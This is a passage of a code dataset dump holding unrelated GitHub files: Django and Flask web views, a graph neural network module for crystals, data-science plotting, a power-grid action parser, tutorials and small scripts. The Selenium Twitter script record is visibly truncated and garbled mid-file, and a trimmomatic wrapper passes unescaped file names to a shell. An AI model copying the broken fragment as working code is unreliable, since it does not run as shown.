recetas['tiempoPreparacion'] + recetas['ingredientes'] + 
recetas['categoria']\nnew_df = recetas[['_id', 'nombre', 'tags']]\nnew_df['tags'] = new_df['tags'].apply(lambda x:\" \".join(x))\nnew_df['tags'] = new_df['tags'].apply(lambda x:x.lower())\nnew_df['tags'] = new_df['tags'].apply(stem)\n\nvectors = cv.fit_transform(new_df['tags']).toarray()\nsimilarity = cosine_similarity(vectors)\n\n# Create your views here.\n\n@csrf_exempt\ndef recomendarApi(request, title):\n if request.method=='GET':\n recomendacion = recommend(title)\n response = np.array(recomendacion, dtype=np.int32)\n return JsonResponse({\"response\": response.tolist()}, safe=False)\n\n@csrf_exempt\ndef recomendarHistorialApi(request,historial):\n if request.method=='GET':\n x = historial.split(',')\n y = []\n for i in x:\n recommendation = recommend(i)\n for j in recommendation:\n y.append(j)\n\n response = np.array(y, dtype=np.int32)\n return JsonResponse({\"recomend\": response.tolist()},safe=False)","repo_name":"Emerdinger/api-django","sub_path":"RecomendApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23805695787","text":"from flask import render_template,request,redirect,url_for,abort,flash\nfrom . import main\nfrom flask_login import login_required,current_user\nfrom ..models import User,Pitch,Comment\nfrom .forms import UpdateProfile,PitchForm,CommentForm\nfrom .. import db,photos\n# import markdown2\n\n# Views\n@main.route('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n title = 'Pitch Application'\n pitch = Pitch.query.all()\n # categories = Category.get_categories()\n return render_template('index.html',title = title, Pitch = pitch)\n\n@main.route('/pitch/new', methods=['GET','POST'])\n@login_required\ndef new_pitch():\n form=PitchForm()\n if form.validate_on_submit():\n pitches=Pitch(category=form.category.data,pitch_content=form.content.data)\n db.session.add(pitches)\n db.session.commit()\n\n flash('pitch created')\n\n pitches=Pitch.query.all()\n return render_template('pitch.html',form=form, pitch=pitches)\n\n\n@main.route('/category/')\ndef category(id):\n\n category = PitchCategory.query.get(id)\n category_name = PitchCategory.query.get(category_name)\n\n if category is None:\n abort(404)\n\n pitch_in_category = Pitch.get_pitch(id)\n return render_template('category.html' ,category= category, pitch= pitch_in_category)\n\n\n@main.route('/pitch/comments/new/',methods = ['GET','POST'])\n@login_required\ndef new_comment(id):\n form = CommentForm()\n if form.validate_on_submit():\n new_comment = Comment(pitch_id =id,data=form.comment.data)\n new_comment.save_comment()\n return redirect(url_for('main.new_pitch'))\n return render_template('ncomment.html', form=form)\n\n@main.route('/comments/')\ndef single_comment(id):\n comment=Comment.query.get(id)\n if comment is None:\n abort(404)\n return render_template('new_comment.html')\n\n@main.route('/view/comment/')\ndef view_comments(id):\n '''\n Function that shows the comments of a particular pitch\n '''\n comments = Comment.get_comments(id)\n \n return render_template('viewcomment.html',comments = comments, id=id)\n\n@main.route('/user/')\ndef profile(uname):\n user = User.query.filter_by(username = uname).first()\n\n if user is None:\n abort(404)\n\n return render_template(\"profile/profile.html\",user = user)\n\n@main.route('/user//update',methods = ['GET','POST'])\n@login_required\ndef update_profile(uname):\n user = 
User.query.filter_by(username = uname).first()\n if user is None:\n abort(404)\n\n form = UpdateProfile()\n\n if form.validate_on_submit():\n user.bio = form.bio.data\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('.profile',uname=user.username))\n\n return render_template('profile/update.html',form =form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.commit()\n return redirect(url_for('main.profile',uname=uname))","repo_name":"edithamadi/pitch_one","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"576660781","text":"# MOFTransformer version 2.0.0\r\nimport random\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n \"\"\"\r\n Convolutional operation on graphs\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(self, atom_fea_len, nbr_fea_len):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.fc_full = nn.Linear(\r\n 2 * self.atom_fea_len + self.nbr_fea_len, 2 * self.atom_fea_len\r\n )\r\n self.sigmoid = nn.Sigmoid()\r\n self.softplus1 = nn.Softplus()\r\n self.bn1 = nn.BatchNorm1d(2 * self.atom_fea_len)\r\n self.bn2 = nn.BatchNorm1d(self.atom_fea_len)\r\n self.softplus2 = nn.Softplus()\r\n\r\n def forward(self, atom_in_fea, nbr_fea, nbr_fea_idx):\r\n \"\"\"\r\n Forward pass\r\n\r\n N: Total number of atoms in the batch\r\n M: Max number of neighbors\r\n\r\n Args:\r\n atom_in_fea: Variable(torch.Tensor) shape (N, atom_fea_len)\r\n Atom hidden features before convolution\r\n nbr_fea: Variable(torch.Tensor) shape (N, M, nbr_fea_len)\r\n Bond features of each atom's M neighbors\r\n nbr_fea_idx: torch.LongTensor shape (N, M)\r\n Indices of M neighbors of each atom\r\n\r\n Returns:\r\n\r\n atom_out_fea: nn.Variable shape (N, atom_fea_len)\r\n Atom hidden features after convolution\r\n\r\n \"\"\"\r\n\r\n N, M = nbr_fea_idx.shape\r\n # convolution\r\n atom_nbr_fea = atom_in_fea[nbr_fea_idx, :] # [N, M, atom_fea_len]\r\n\r\n total_nbr_fea = torch.cat(\r\n [\r\n atom_in_fea.unsqueeze(1).expand(N, M, self.atom_fea_len),\r\n # [N, atom_fea_len] -> [N, M, atom_fea_len] -> v_i\r\n atom_nbr_fea, # [N, M, atom_fea_len] -> v_j\r\n nbr_fea,\r\n ], # [N, M, nbr_fea_len] -> u(i,j)_k\r\n dim=2,\r\n )\r\n # [N, M, atom_fea_len*2+nrb_fea_len]\r\n\r\n total_gated_fea = self.fc_full(total_nbr_fea) # [N, M, atom_fea_len*2]\r\n total_gated_fea = self.bn1(\r\n total_gated_fea.view(-1, self.atom_fea_len * 2)\r\n ).view(\r\n N, M, self.atom_fea_len * 2\r\n ) # [N, M, atom_fea_len*2]\r\n nbr_filter, nbr_core = total_gated_fea.chunk(2, dim=2) # [N, M, atom_fea_len]\r\n nbr_filter = self.sigmoid(nbr_filter)\r\n nbr_core = self.softplus1(nbr_core)\r\n nbr_sumed = torch.sum(nbr_filter * nbr_core, dim=1) # [N, atom_fea_len]\r\n nbr_sumed = self.bn2(nbr_sumed)\r\n out = self.softplus2(atom_in_fea + nbr_sumed) # [N, atom_fea_len]\r\n return out\r\n\r\n\r\nclass GraphEmbeddings(nn.Module):\r\n \"\"\"\r\n Generate Embedding layers made by only convolution layers of CGCNN (not pooling)\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(\r\n self, atom_fea_len, 
nbr_fea_len, max_graph_len, hid_dim, n_conv=3, vis=False\r\n ):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.max_graph_len = max_graph_len\r\n self.hid_dim = hid_dim\r\n self.embedding = nn.Embedding(119, atom_fea_len) # 119 -> max(atomic number)\r\n self.convs = nn.ModuleList(\r\n [\r\n ConvLayer(atom_fea_len=atom_fea_len, nbr_fea_len=nbr_fea_len)\r\n for _ in range(n_conv)\r\n ]\r\n )\r\n self.fc = nn.Linear(atom_fea_len, hid_dim)\r\n\r\n self.vis = vis\r\n\r\n def forward(\r\n self, atom_num, nbr_idx, nbr_fea, crystal_atom_idx, uni_idx, uni_count, moc=None\r\n ):\r\n \"\"\"\r\n Args:\r\n atom_num (tensor): [N', atom_fea_len]\r\n nbr_idx (tensor): [N', M]\r\n nbr_fea (tensor): [N', M, nbr_fea_len]\r\n crystal_atom_idx (list): [B]\r\n uni_idx (list) : [B]\r\n uni_count (list) : [B]\r\n Returns:\r\n new_atom_fea (tensor): [B, max_graph_len, hid_dim]\r\n mask (tensor): [B, max_graph_len]\r\n \"\"\"\r\n assert self.nbr_fea_len == nbr_fea.shape[-1]\r\n\r\n atom_fea = self.embedding(atom_num) # [N', atom_fea_len]\r\n for conv in self.convs:\r\n atom_fea = conv(atom_fea, nbr_fea, nbr_idx) # [N', atom_fea_len]\r\n atom_fea = self.fc(atom_fea) # [N', hid_dim]\r\n\r\n new_atom_fea, mask, mo_label = self.reconstruct_batch(\r\n atom_fea, crystal_atom_idx, uni_idx, uni_count, moc\r\n )\r\n # [B, max_graph_len, hid_dim], [B, max_graph_len]\r\n return new_atom_fea, mask, mo_label # None will be replaced with MOC\r\n\r\n def reconstruct_batch(self, atom_fea, crystal_atom_idx, uni_idx, uni_count, moc):\r\n batch_size = len(crystal_atom_idx)\r\n\r\n new_atom_fea = torch.full(\r\n size=[batch_size, self.max_graph_len, self.hid_dim], fill_value=0.0\r\n ).to(atom_fea)\r\n\r\n mo_label = torch.full(\r\n size=[batch_size, self.max_graph_len], fill_value=-100.0\r\n ).to(atom_fea)\r\n\r\n for bi, c_atom_idx in enumerate(crystal_atom_idx):\r\n # set uni_idx with (descending count or random) and cut max_graph_len\r\n idx_ = torch.LongTensor([random.choice(u) for u in uni_idx[bi]])[\r\n : self.max_graph_len\r\n ]\r\n rand_idx = idx_[torch.randperm(len(idx_))]\r\n if self.vis:\r\n rand_idx = idx_\r\n new_atom_fea[bi][: len(rand_idx)] = atom_fea[c_atom_idx][rand_idx]\r\n\r\n if moc:\r\n mo = torch.zeros(len(c_atom_idx))\r\n metal_idx = moc[bi]\r\n mo[metal_idx] = 1\r\n mo_label[bi][: len(rand_idx)] = mo[rand_idx]\r\n\r\n mask = (new_atom_fea.sum(dim=-1) != 0).float()\r\n\r\n return new_atom_fea, mask, mo_label\r\n","repo_name":"hspark1212/MOFTransformer","sub_path":"moftransformer/modules/cgcnn.py","file_name":"cgcnn.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"16"} +{"seq_id":"28896004403","text":"def solution(s, e, sum1):\n global flag, K\n\n if flag == 1:\n return\n if sum1 > K:\n return\n if sum1 == K:\n flag = 1\n return\n if s == e:\n return\n\n solution(s+1, e, sum1)\n solution(s+1, e, sum1+data[s])\n\n\nT = int(input())\nfor i in range(T):\n N, K = map(int, input().split())\n data = list(map(int, input().split()))\n flag = 0\n solution(0, N, 0)\n if flag == 1:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\n","repo_name":"jho0078/til","sub_path":"algorithm/D24_2019_03_28(AD)/더하기.py","file_name":"더하기.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"307703819","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nfrom 
msedge.selenium_tools import Edge, EdgeOptions\nfrom selenium.webdriver.common.keys import Keys\nfrom werkzeug.wrappers import response\nfrom data import Twitter\nfrom scripts import tweeting\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Protocol.KDF import PBKDF2\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nimport time\n\n#login data\n# username = Twitter['username']\n# password = Twitter['password']\n\n# salt storing\nsalt = b'\\xec\\x86\\xc6\\xcao?3`.\\xe8\\x86\\x0b\\xcd?I\\x8dV\\x808c\\x94\\x03\\x95~\\xf3\\xb7 problem is the instienace\n# functional programming =>","repo_name":"OsamaElsherif/socialmedia","sub_path":"webApplication/twiiter.py","file_name":"twiiter.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28924195510","text":"#!/usr/bin/env python\n\n\"\"\"\nStart the process and dump the documentation to the doc dir\n\"\"\"\n\nimport socket, subprocess, time,os\n\nenv = os.environ\nenv['L1FWD_BTS_HOST'] = '127.0.0.1'\n\nbts_proc = subprocess.Popen([\"./src/osmo-bts-sysmo/sysmobts-remote\",\n\t\t\"-c\", \"./doc/examples/sysmo/osmo-bts-sysmo.cfg\"], env = env,\n\t\tstdin=None, stdout=None)\ntime.sleep(1)\n\ntry:\n\tsck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsck.setblocking(1)\n\tsck.connect((\"localhost\", 4241))\n\tsck.recv(4096)\n\n\t# Now send the command\n\tsck.send(\"show online-help\\r\")\n\txml = \"\"\n\twhile True:\n\t\tdata = sck.recv(4096)\n\t\txml = \"%s%s\" % (xml, data)\n\t\tif data.endswith('\\r\\nOsmoBTS> '):\n\t\t\tbreak\n\n\t# Now write everything until the end to the file\n\tout = open('doc/vty_reference.xml', 'w')\n\tout.write(xml[18:-11])\n\tout.close()\nfinally:\n\t# Clean-up\n\tbts_proc.kill()\n\tbts_proc.wait()\n\n","repo_name":"osmocom/osmo-bts","sub_path":"contrib/dump_docs.py","file_name":"dump_docs.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"} +{"seq_id":"73390894408","text":"from django.contrib import admin\r\nfrom .models import Product, Order, OrderItem\r\n\r\n\r\nclass ProductAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product_name', 'stock')\r\n ordering = ('-stock',)\r\n\r\n\r\nclass OrderAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('source', 'order_id')\r\n\r\n\r\nclass OrderItemAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product',)\r\n\r\n\r\n# Register your models here.\r\nadmin.site.register(Product, ProductAdmin)\r\nadmin.site.register(Order, OrderAdmin)\r\nadmin.site.register(OrderItem, OrderItemAdmin)\r\n","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"simpleapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14014173799","text":"import os, time, json, argparse\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom EventIDs import IDs\nfrom Plot_maker import low_stat_Z\n\nprint(xgb.__version__)\n\nt0 = time.time()\nstart = time.asctime(time.localtime())\nprint('Started', start)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--met_reg', type=str, default=\"50-100\", help=\"MET signal region\")\nparser.add_argument('--dm_model', type=str, default=\"DH_HDS\", 
help=\"Dataset to test\")\nparser.add_argument('--channel', type=str, default=\"ee\", help=\"Lepton channel to test\")\nargs = parser.parse_args()\n\nmet_reg = args.met_reg\ndm_model = args.dm_model\nchannel = args.channel \n\n\n\nN = 9\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\"color\", plt.cm.PuRd_r(np.linspace(0.1,0.95,N)))\n\ndef Z_score_array(sig_pred, bkg_pred):\n np.seterr(divide='ignore', invalid='ignore') # Remove true divide message\n return [low_stat_Z(sum(sig_pred[25:]), sum(bkg_pred[25:])), \n low_stat_Z(sum(sig_pred[30:]), sum(bkg_pred[30:])), \n low_stat_Z(sum(sig_pred[35:]), sum(bkg_pred[35:])),\n low_stat_Z(sum(sig_pred[40:]), sum(bkg_pred[40:])), \n low_stat_Z(sum(sig_pred[45:]), sum(bkg_pred[45:])), \n low_stat_Z(sig_pred[-1], bkg_pred[-1])]\n\nnp_dir = '/storage/racarcam/Data/XGB_frfr/'+met_reg+'/'+dm_model+'/'\n\nsig_mzp_130 = np.load(np_dir+'mZp_130/sig_pred_'+channel+'.npy')\nsig_mzp_200 = np.load(np_dir+'mZp_200/sig_pred_'+channel+'.npy')\nsig_mzp_400 = np.load(np_dir+'mZp_400/sig_pred_'+channel+'.npy')\nsig_mzp_600 = np.load(np_dir+'mZp_600/sig_pred_'+channel+'.npy')\n\nbkg_mzp_130 = np.load(np_dir+'mZp_130/bkg_pred_'+channel+'.npy')\nbkg_mzp_200 = np.load(np_dir+'mZp_200/bkg_pred_'+channel+'.npy')\nbkg_mzp_400 = np.load(np_dir+'mZp_400/bkg_pred_'+channel+'.npy')\nbkg_mzp_600 = np.load(np_dir+'mZp_600/bkg_pred_'+channel+'.npy')\n\nmodel_dsids = []\njson_file = open('DM_DICT_Zp_dsid.json')\nDM_file = json.load(json_file)\nfor key in DM_file.keys():\n word = key.split('_')\n model_sec = word[0]+'_'+word[1]\n if model_sec == dm_model.lower():\n model_dsids.append(DM_file[key])\n\njson_file2 = open('DM_DICT.json')\nmodel_names = json.load(json_file2)\nsave_as = 'mZp_'+model_names[model_dsids[0][0]].split(' ')[-2]+'/'\n\nplot_dir = '../../Plots/XGBoost/Model_independent_frfr/'+met_reg+'/'+dm_model+'/'\n\nplt.figure(figsize=(11,8))\nX_axis = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99]\nY_axis_130 = Z_score_array(sig_mzp_130, bkg_mzp_130)\nY_axis_200 = Z_score_array(sig_mzp_200, bkg_mzp_200)\nY_axis_400 = Z_score_array(sig_mzp_400, bkg_mzp_400)\nY_axis_600 = Z_score_array(sig_mzp_600, bkg_mzp_600)\n\nplt.figure(figsize=[10,6])\nplt.plot(X_axis, Y_axis_130, linestyle='--')\nplt.scatter(X_axis, Y_axis_130, label = \"$m_{Z'}$ 130 GeV\")\nplt.plot(X_axis, Y_axis_200, linestyle='--')\nplt.scatter(X_axis, Y_axis_200, label = \"$m_{Z'}$ 200 GeV\")\nplt.plot(X_axis, Y_axis_400, linestyle='--')\nplt.scatter(X_axis, Y_axis_400, label = \"$m_{Z'}$ 400 GeV\")\nplt.plot(X_axis, Y_axis_600, linestyle='--')\nplt.scatter(X_axis, Y_axis_600, label = \"$m_{Z'}$ 600 GeV\")\nplt.xlim([0,1])\nplt.ylim([np.nanmin(Y_axis_600)*0.9, np.nanmax(Y_axis_130)*1.1])\nplt.yscale('log')\nplt.grid(True)\nplt.legend()\nplt.ylabel('Expected significance [$\\sigma$]')\nif met_reg =='50-100':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR1\")\nelif met_reg =='100-150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR2\")\nelif met_reg =='150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR3\")\nplt.xlabel('XGBoost 
output')\nplt.savefig(plot_dir+'EXP_SIG_'+channel+'.pdf')\n\n","repo_name":"rubenguevara/Master-Thesis","sub_path":"ML/XGBoost/FULL_model_independent_testing_plot_sig.py","file_name":"FULL_model_independent_testing_plot_sig.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27637485119","text":"import os\nimport sys\n\n\ndef pairedEnd(R1, R2):\n print(sys.path)\n try:\n os.popen(\" \".join(\n ['trimmomatic PE -phred33 ',\n R1,\n R2,\n R1+'.paired',\n R1+'.unpaired',\n R2+'.paired',\n R2+'.unpaired',\n 'LEADING:3',\n 'TRAILING:3',\n 'SLIDINGWINDOW:4:15',\n 'MINLEN:36'\n ])).read()\n return True\n except:\n return False\n","repo_name":"gaarangoa/deeparg","sub_path":"deeparg/short_reads_pipeline/tools/trimmomaticClass.py","file_name":"trimmomaticClass.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17394387354","text":"import json\nimport os\nimport numpy as np\n\nfrom grid2op.Parameters import Parameters\nfrom oracle4grid.core.utils.config_ini_utils import MAX_ITER\n\nfrom oracle4grid.core.utils.constants import EnvConstants\nfrom oracle4grid.core.utils.prepare_environment import prepare_env\n#from oracle4grid.core.oracle import oracle\n\nASSET_MAPPING = {\"line (origin)\":\"lines_id_bus\",\n \"line (extremity)\":\"lines_id_bus\",\n \"generator\":\"gens_id_bus\",\n \"load\":\"loads_id_bus\"}\n\n#def load_and_run(env_dir, chronic, action_file, debug,agent_seed,env_seed, config, constants=EnvConstants()):\n# atomic_actions, env, debug_directory, chronic_id = load(env_dir, chronic, action_file, debug, constants=constants, config = config)\n# # Parse atomic_actions format\n# # atomic_actions = parse(atomic_actions,env)\n# parser = OracleParser(atomic_actions, env.action_space)\n# atomic_actions = parser.parse()\n#\n# # Run all steps\n# return oracle(atomic_actions, env, debug, config, debug_directory=debug_directory,agent_seed=agent_seed,env_seed=env_seed,\n# grid_path=env_dir, chronic_scenario=chronic, constants=constants)\n\n\ndef load(env_dir, chronic, action_file, debug, constants=EnvConstants(), config = None, opponent_allowed=True):\n param = Parameters()\n param.init_from_dict(constants.DICT_GAME_PARAMETERS_SIMULATION)\n env, chronic_id = prepare_env(env_dir, chronic, param, opponent_allowed=opponent_allowed)\n\n # Load unitary actions\n with open(action_file) as f:\n atomic_actions = json.load(f)\n\n # Init debug mode if necessary\n if debug:\n try:\n output_path = config[\"output_path\"]\n except:\n output_path = \"oracle4grid/output\" # os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../..\",'output')\n debug_directory = init_debug_directory(env_dir, action_file, chronic, output_path)\n else:\n debug_directory = None\n return atomic_actions, env, debug_directory, chronic_id\n\n\ndef init_debug_directory(env_dir, action_file, chronic, output_path = None):\n\n action_file_os = os.path.split(action_file)[len(os.path.split(action_file)) - 1].replace(\".json\", \"\")\n grid_file_os = os.path.split(env_dir)[len(os.path.split(env_dir)) - 1]\n scenario = \"scenario_\" + str(chronic)\n debug_directory = os.path.join(output_path, grid_file_os, scenario, action_file_os)\n os.makedirs(debug_directory, exist_ok=True)\n replay_debug_directory = os.path.join(debug_directory, \"replay_logs\")\n os.makedirs(replay_debug_directory, exist_ok=True)\n return debug_directory\n\nclass 
OracleParser():\n def __init__(self, d, action_space):\n self.d = d\n self.action_space = action_space\n self.parse = self.choose_parser_function()\n\n def choose_parser_function(self):\n if type(self.d) is list:\n if 'set_bus' in list(self.d[0].keys()):\n if 'substations_id' in list(self.d[0]['set_bus'].keys()):\n # Format 1 detected\n print(\"Specific format is detected for actions: converting with parser 1\")\n return self.parser1\n if type(self.d) is dict:\n if 'sub' in list(self.d.keys()) or 'line' in list(self.d.keys()):\n first_key = list(self.d.keys())[0]\n first_sub_or_line_id = list(self.d[first_key].keys())[0]\n if first_sub_or_line_id.isnumeric():\n if type(self.d[first_key][first_sub_or_line_id]) is list:\n first_action = self.d[first_key][first_sub_or_line_id][0]\n specific_key = list(first_action.keys())[0]\n if specific_key == \"set_configuration\":\n # Format 2 detected\n print(\"Specific format is detected for actions: converting with parser 2\")\n return self.parser2\n elif specific_key in list(ASSET_MAPPING.values()) or specific_key == \"set_line\":\n # Natural Oracle Format\n print(\"Natural Oracle format is detected for actions\")\n return self.parser0\n else:\n raise ValueError(\"json action dict is in an unknown format - action key \"+str(specific_key)+\" not handled\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n\n def parser0(self):\n return self.d\n\n def parser1(self):\n subs = set()\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n sub = sub_action[0]\n subs.add(sub)\n\n # init new dict with subs\n new_d = {'sub': {sub: [] for sub in subs}}\n\n # Pas bonne idée, parcourir dans la boucle\n grid = self.action_space.cls_to_dict()\n\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n subid = sub_action[0]\n sub_topo = sub_action[1]\n\n # On cherche les ids des gens, loads et lines_ex/or modifiées par l'action sub_topo (qui donne le nouveau bus)\n # Generators\n gen_ids = [id_ for id_, subid_ in enumerate(grid['gen_to_subid']) if\n subid_ == subid] # id des générateurs concernés par cette substation\n new_action_on_gens = {\"gens_id_bus\":\n [[id_, sub_topo[grid['gen_to_sub_pos'][id_]]] for id_ in gen_ids]\n # Couples id du générateur, nouveau bus donné par sub_topo\n }\n # Loads\n load_ids = [id_ for id_, subid_ in enumerate(grid['load_to_subid']) if\n subid_ == subid]\n new_action_on_loads = {\"loads_id_bus\":\n [[id_, sub_topo[grid['load_to_sub_pos'][id_]]] for id_ in load_ids]\n }\n # Lines origins and extremities gathered\n line_or_ids = [id_ for id_, subid_ in enumerate(grid['line_or_to_subid']) if\n subid_ == subid]\n line_ex_ids = [id_ for id_, subid_ in enumerate(grid['line_ex_to_subid']) if\n subid_ == subid]\n new_action_on_lines = {\"lines_id_bus\":\n [[id_, sub_topo[grid['line_or_to_sub_pos'][id_]]] for id_ in line_or_ids] + [\n [id_, sub_topo[grid['line_ex_to_sub_pos'][id_]]] for id_ in line_ex_ids]\n }\n new_action = {**new_action_on_loads, **new_action_on_gens, **new_action_on_lines}\n new_d['sub'][subid].append(new_action)\n # TODO: lines\n return new_d\n\n def parser2(self):\n new_dict = {line_or_sub:\n {id_: [] for id_ in self.d[line_or_sub]}\n for line_or_sub in self.d.keys()}\n for line_or_sub in self.d:\n for id_ in self.d[line_or_sub]:\n for original_action in self.d[line_or_sub][id_]:\n action = 
np.array(original_action['set_configuration'])\n asset_types, asset_ids, asset_actions = find_and_check_action_on_assets(action, self.action_space,\n line_or_sub, int(id_))\n unitary_action_dict = get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub)\n target_l = new_dict[line_or_sub][id_].copy()\n target_l.append(unitary_action_dict)\n new_dict[line_or_sub][id_] = target_l\n return new_dict\n\ndef find_and_check_action_on_assets(action, action_space, line_or_sub, id_):\n impact = action_space.from_vect(action).impact_on_objects()\n\n # Initialize list of results\n asset_types = []\n asset_ids = []\n asset_actions = []\n\n # In case the action is on sub, check it is the case and on the right sub\n # Then, extract infos on assets impacted\n if line_or_sub == 'sub':\n bus_impact = impact['topology']['assigned_bus']\n if len(bus_impact) == 0:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" doesnt impact substation bus\")\n else:\n for sub_action in bus_impact:\n if sub_action['substation'] != id_:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" impacts an other substation (sub number \"+str(sub_action['substation'])+\")\")\n else:\n asset_actions.append(int(sub_action['bus']))\n asset_ids.append(int(sub_action['object_id']))\n asset_types.append(ASSET_MAPPING[sub_action['object_type']])\n\n # In case it is line disconnection, just check it impacts the right line\n elif line_or_sub == \"line\":\n line_impact = impact['force_line']['disconnections']['powerlines']\n if len(line_impact) == 0:\n raise ValueError(\"Declared line action on line number\"+str(id_)+\" doesnt disconnect any line\")\n else:\n for line_id_disc in line_impact:\n if line_id_disc != id_:\n raise ValueError(\"Declared line disconnection on line number\"+str(id_)+\" impacts an other line (sub number \"+str(line_id_disc)+\")\")\n\n return asset_types, asset_ids, asset_actions\n\n\ndef get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub):\n if line_or_sub == \"sub\":\n d = dict()\n for asset_type, asset_id, asset_action in zip(asset_types, asset_ids, asset_actions):\n if asset_type in list(d.keys()):\n # update new sub action on this asset type\n action_on_asset = d[asset_type].copy()\n action_on_asset.append([asset_id, asset_action])\n d[asset_type] = action_on_asset\n else:\n # First action on this asset type\n d[asset_type] = [[asset_id, asset_action]]\n elif line_or_sub == \"line\":\n d = {\"set_line\":-1}\n return d\n","repo_name":"marota/Oracle4Grid","sub_path":"oracle4grid/core/utils/launch_utils.py","file_name":"launch_utils.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"40976302130","text":"\n'''\n* 논리 연산자 (&, |, and, or, not)\n\n# &, and: 좌항과 우항의 논리값이 모두 True일 경우에만 전체 결과 True 도출\n'''\na = 5\n\nif a > 1 and a < 10:\n print('asms 1~10 사이의 숫자가 아닙니다.')\nelse:\n print('a는 1~10 사이의 숫자가 아닙니다.')\n\n# 파이썬은 위의 식을 연결해서 작성 가능\nif 1 < a < 10:\n print('ok!')\n\n'''\n|, or: 좌항과 우항의 논리값이 한 쪽만 True여도 전체 결과 True 도출\n'''\n\n'''\n* 단축 평가 여산 (short circuit: and, or)\n- 좌항에서 전체 결과가 판명났을 경우 우항 연산을 진행하지 않는 연산자\n'''\n\nc = 0\n\nif(c == 0) or (10 / c == 5): # 우항에서 100% 에러가 나는 상황\n print('에러 없이 통과')\n\n# not 여산자는 논리값을 반전시킴\n\n'''\n- c언어에서는 정수 0을 False로 해석하고, \n0이 아닌 모든 정수를 True로 해석 (논리형 없음)\n파이썬에서도 C의 논리해석 그대로 적용 가능\n'''\n\napple = 5\nif not apple:\n print('사과가 하나도 없습니다.')\nelse:\n print('사과가', apple, '개 있습니다.')\n\n'''\n* 코딩도장 연습문제\n국어, 영어, 수학, 과학 점수가 
